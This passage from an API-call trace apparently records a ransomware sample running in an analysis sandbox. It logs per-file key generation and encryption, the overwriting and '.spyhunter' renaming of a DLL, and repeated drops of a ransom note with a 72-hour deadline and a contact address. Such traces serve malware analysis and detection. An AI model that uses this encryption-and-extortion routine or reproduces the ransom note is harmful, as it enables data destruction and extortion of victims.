hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcc8 | out: pbBuffer=0x270fcc8) returned 1 [0091.931] GetProcessHeap () returned 0x2c0000 [0091.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.931] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fcc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fcc0*=0x30) returned 1 [0091.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.932] GetProcessHeap () returned 0x2c0000 [0091.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.932] GetProcessHeap () returned 0x2c0000 [0091.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cc98 | out: hHeap=0x2c0000) returned 1 [0091.932] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcc0 | out: pbBuffer=0x270fcc0) returned 1 [0091.932] GetProcessHeap () returned 0x2c0000 [0091.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.932] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fcb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fcb8*=0x30) returned 1 [0091.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.933] GetProcessHeap () returned 0x2c0000 [0091.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.933] GetProcessHeap () returned 0x2c0000 [0091.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cbd8 | out: hHeap=0x2c0000) returned 1 [0091.933] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcc0 | out: pbBuffer=0x270fcc0) returned 1 [0091.933] GetProcessHeap () returned 0x2c0000 [0091.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.933] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fcb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fcb8*=0x30) returned 1 [0091.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcfr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.933] GetProcessHeap () returned 0x2c0000 [0091.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.933] GetProcessHeap () returned 0x2c0000 [0091.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cb18 | out: hHeap=0x2c0000) returned 1 [0091.933] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcb8 | out: pbBuffer=0x270fcb8) returned 1 [0091.933] GetProcessHeap () returned 0x2c0000 [0091.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.933] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fcb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fcb0*=0x30) returned 1 [0091.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.934] GetProcessHeap () returned 0x2c0000 [0091.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.934] GetProcessHeap () returned 0x2c0000 [0091.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cf98 | out: hHeap=0x2c0000) returned 1 [0091.934] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcb8 | out: pbBuffer=0x270fcb8) returned 1 [0091.934] GetProcessHeap () returned 0x2c0000 [0091.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fcb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fcb0*=0x30) returned 1 [0091.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.934] GetProcessHeap () returned 0x2c0000 [0091.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.934] GetProcessHeap () returned 0x2c0000 [0091.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ca58 | out: hHeap=0x2c0000) returned 1 [0091.934] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcb0 | out: pbBuffer=0x270fcb0) returned 1 [0091.934] GetProcessHeap () returned 0x2c0000 [0091.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fca8*=0x30) returned 1 [0091.935] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.935] GetProcessHeap () returned 0x2c0000 [0091.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.935] GetProcessHeap () returned 0x2c0000 [0091.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c998 | out: hHeap=0x2c0000) returned 1 [0091.935] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fcb0 | out: pbBuffer=0x270fcb0) returned 1 [0091.935] GetProcessHeap () returned 0x2c0000 [0091.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.936] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fca8*=0x30) returned 1 [0091.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg" (normalized: "c:\\program files\\common files\\system\\msadc\\handsafe.reg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.936] GetProcessHeap () returned 0x2c0000 [0091.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.936] GetProcessHeap () returned 0x2c0000 [0091.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c8d8 | out: hHeap=0x2c0000) returned 1 [0091.936] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fca8 | out: pbBuffer=0x270fca8) returned 1 [0091.936] GetProcessHeap () returned 0x2c0000 [0091.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.936] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fca0*=0x30) returned 1 [0091.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg" (normalized: "c:\\program files\\common files\\system\\msadc\\handler.reg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.936] GetProcessHeap () returned 0x2c0000 [0091.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.936] GetProcessHeap () returned 0x2c0000 [0091.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d058 | out: hHeap=0x2c0000) returned 1 [0091.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.938] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.938] WriteFile (in: hFile=0x17c, lpBuffer=0x270fbdb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fd04, lpOverlapped=0x0 | out: lpBuffer=0x270fbdb*, lpNumberOfBytesWritten=0x270fd04*=0x127, lpOverlapped=0x0) returned 1 [0091.939] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.939] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fd04, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fd04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.939] CloseHandle (hObject=0x17c) returned 1 [0091.939] GetProcessHeap () returned 0x2c0000 [0091.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e8c0 | out: hHeap=0x2c0000) returned 1 [0091.939] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fca0 | out: pbBuffer=0x270fca0) returned 1 [0091.939] GetProcessHeap () returned 0x2c0000 [0091.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.939] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc98*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc98*=0x30) returned 1 [0091.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.940] GetProcessHeap () returned 0x2c0000 [0091.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.940] GetProcessHeap () returned 0x2c0000 [0091.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e7e8 | out: hHeap=0x2c0000) returned 1 [0091.940] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fca0 | out: pbBuffer=0x270fca0) returned 1 [0091.940] GetProcessHeap () returned 0x2c0000 [0091.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.940] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc98*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc98*=0x30) returned 1 [0091.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.941] GetProcessHeap () returned 0x2c0000 [0091.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.941] GetProcessHeap () returned 0x2c0000 [0091.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e710 | out: hHeap=0x2c0000) returned 1 [0091.941] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc98 | out: pbBuffer=0x270fc98) returned 1 [0091.941] GetProcessHeap () returned 0x2c0000 [0091.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.941] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc90*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc90*=0x30) returned 1 [0091.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.941] GetProcessHeap () returned 0x2c0000 [0091.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.941] GetProcessHeap () returned 0x2c0000 [0091.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e638 | out: hHeap=0x2c0000) returned 1 [0091.941] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc98 | out: pbBuffer=0x270fc98) returned 1 [0091.941] GetProcessHeap () returned 0x2c0000 [0091.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.942] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc90*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc90*=0x30) returned 1 [0091.942] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.942] GetProcessHeap () returned 0x2c0000 [0091.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.942] GetProcessHeap () returned 0x2c0000 [0091.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0091.942] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc90 | out: pbBuffer=0x270fc90) returned 1 [0091.942] GetProcessHeap () returned 0x2c0000 [0091.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.942] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc88*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc88*=0x30) returned 1 [0091.942] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcfr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.942] GetProcessHeap () returned 0x2c0000 [0091.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.942] GetProcessHeap () returned 0x2c0000 [0091.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e488 | out: hHeap=0x2c0000) returned 1 [0091.942] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc90 | out: pbBuffer=0x270fc90) returned 1 [0091.942] GetProcessHeap () returned 0x2c0000 [0091.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.942] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc88*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc88*=0x30) returned 1 [0091.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.943] GetProcessHeap () returned 0x2c0000 [0091.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0091.943] GetProcessHeap () returned 0x2c0000 [0091.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0091.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.944] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.944] WriteFile (in: hFile=0x17c, lpBuffer=0x270fbbf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fce8, lpOverlapped=0x0 | out: lpBuffer=0x270fbbf*, lpNumberOfBytesWritten=0x270fce8*=0x127, lpOverlapped=0x0) returned 1 [0091.945] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.945] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fce8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fce8*=0x2ac, lpOverlapped=0x0) returned 1 [0091.945] CloseHandle (hObject=0x17c) returned 1 [0091.945] GetProcessHeap () returned 0x2c0000 [0091.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0091.946] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc88 | out: pbBuffer=0x270fc88) returned 1 [0091.946] GetProcessHeap () returned 0x2c0000 [0091.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0091.946] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc80*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc80*=0x30) returned 1 [0091.946] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.946] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL") returned 72 [0091.946] StrStrW (lpFirst="MSOSV.DLL", lpSrch=".txt") returned 0x0 [0091.946] GetProcessHeap () returned 0x2c0000 [0091.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0091.946] ReadFile (in: hFile=0x17c, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fc44, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x270fc44*=0x2800, lpOverlapped=0x0) returned 1 [0092.009] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.009] WriteFile (in: hFile=0x17c, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fc44, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x270fc44*=0x2800, lpOverlapped=0x0) returned 1 [0092.009] GetProcessHeap () returned 0x2c0000 [0092.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0092.010] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.010] WriteFile (in: hFile=0x17c, lpBuffer=0x270fc84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fc44, lpOverlapped=0x0 | out: lpBuffer=0x270fc84*, lpNumberOfBytesWritten=0x270fc44*=0x4, lpOverlapped=0x0) returned 1 [0092.021] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fc44, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270fc44*=0x30, lpOverlapped=0x0) returned 1 [0092.021] CloseHandle (hObject=0x17c) returned 1 [0092.023] GetProcessHeap () returned 0x2c0000 [0092.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0092.023] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL.spyhunter") returned 82 [0092.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll.spyhunter")) returned 1 [0092.023] GetProcessHeap () returned 0x2c0000 [0092.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0092.024] GetProcessHeap () returned 0x2c0000 [0092.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.024] GetProcessHeap () returned 0x2c0000 [0092.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0092.024] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc80 | out: pbBuffer=0x270fc80) returned 1 [0092.024] GetProcessHeap () returned 0x2c0000 [0092.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.024] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc78*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc78*=0x30) returned 1 [0092.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0xc0000000, 